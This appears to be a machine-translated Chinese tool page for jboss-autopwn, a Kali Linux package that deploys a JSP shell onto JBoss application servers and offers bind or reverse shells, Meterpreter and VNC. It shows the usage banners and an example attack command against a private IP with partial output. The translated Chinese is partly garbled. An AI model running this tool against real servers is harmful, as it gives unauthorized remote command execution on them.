的jboss-autopwn包装说明
这JBoss的脚本部署一个JSP壳目标的JBoss AS服务器上。一旦部署完成,该脚本用自己的上传和命令执行能力提供一个交互式会话。
其特点包括:
- 跨平台支持 - 在Windows,Linux和Mac目标测试
- 支持绑定和反向绑定弹
- Meterpreter就会弹和Windows目标的VNC支持
资料来源:https://github.com/SpiderLabs/jboss-autopwn
的jboss-autopwn首页 | 卡利的jboss-autopwn回购
- 作者:基督教G. Papathanasiou,Trustwave控股公司
- 许可:GPL第二版
包含在jboss-autopwn封装工具
JBoss的双赢 - 的JBoss的Windows autopwn
[email protected]:~# [email protected]:~# jboss-win
[!] JBoss Windows autopwn
[!] Usage: ./e2.sh server port
[!] Christian Papathanasiou [email protected]
[!] Trustwave SpiderLabsJBoss的Linux的 - JBoss的* nix的autopwn
[email protected]:~# jboss-linux
[!] JBoss *nix autopwn
[!] Usage: ./e.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs的jboss-autopwn用法示例
攻击指定的端口(8080)上的目标服务器(192.168.1.200),重定向标准错误(2>的/ dev / null的):
[email protected]:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file: